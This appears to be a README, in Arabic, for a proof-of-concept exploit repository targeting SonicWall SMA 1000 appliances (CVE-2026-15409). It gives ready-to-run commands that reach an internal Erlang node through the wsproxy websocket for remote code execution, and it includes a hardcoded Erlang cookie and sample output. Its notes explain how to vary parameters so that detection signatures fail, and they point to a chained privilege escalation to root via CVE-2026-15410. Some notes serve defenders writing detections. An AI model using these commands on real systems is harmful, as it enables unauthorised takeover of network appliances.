CVE-2026-15409
يحتوي هذا المستودع على إثبات لمفهوم استغلال الثغرة CVE-2026-15409. يقوم بتأسيس تنفيذ تعليمات برمجية عن بُعد بدون صلاحيات الجذر على SonicWall SMA 1000 من خلال تنفيذ بروتوكول Erlang المتوقع بواسطة localhost:1050 وتوجيهه عبر websocket لقراءة/كتابة الملفات وتنفيذ تعليمات برمجية عشوائية عبر استدعاءات RPC.
الاستخدام
# python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --exec 'whoami && id && pwd && hostname'
Authenticated to [email protected]
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 => couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma
ملاحظات حول الاستغلال والكشف
- يستهدف هذا الاستغلال خدمة WorkPlace (التي تستمع عادةً على المنفذ 443)، ومن المرجح أن تكون ممكّنة طوال الوقت تقريبًا (تتطلب إعداد طريقة مصادقة مستخدم مثل AD الأساسي)
- تم تطويره ضد ex_sra_vm_12.5.0-02002.ova مع تطبيق التحديث لشهر يونيو 2026 (الأحدث قبل التصحيح)
- مثال: python3 cve-2026-15409.py --ws-url 'wss://TARGET_IP_HERE/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'touch /var/tmp/remote_code_execution'
- يجب أن يكون ملف تعريف ارتباط (cookie) عقدة Erlang المستخدم للاستغلال متسقًا عبر الأهداف، وهو مبرمج بشكل ثابت لعملية Erlang على localhost:1050، بناءً على الاختبارات.
- يجب أن تعمل قيم bmID العشوائية بشكل عام طالما أن القيمة تبدأ بـ "-3389". لا تكتب تواقيع ضد "serviceType=SSH"، حيث أن هناك بدائل مثل TELNET تعمل أيضًا. يمكن استبدال 0.0.0.0 بصيغ عناوين بديلة أيضًا.
- المنفذ 1050 هو أسلوب استغلال، وليس شرطًا مبرمجًا بشكل ثابت للاستغلال. تم رصد EITW يستهدف المنفذ 8188 أيضًا، على الرغم من أنه يبدو من الأسهل استخدام 1050. قد تكون هناك خدمات أخرى على منافذ مختلفة يمكن استغلالها أيضًا. من المحتمل أن يكون تنفيذ التعليمات البرمجية في بيئة الاستغلال الحقيقية في سياقات مستخدم أخرى غير couchdb، بسبب اختلاف التقنيات المستخدمة.
- يمكن للمهاجم رفع الصلاحيات إلى root باستخدام استغلال التجول عبر xmlrpc "remove hotfix" CVE-2026-15410 (الذي يستهدف localhost:8188) بمجرد تأسيس شل.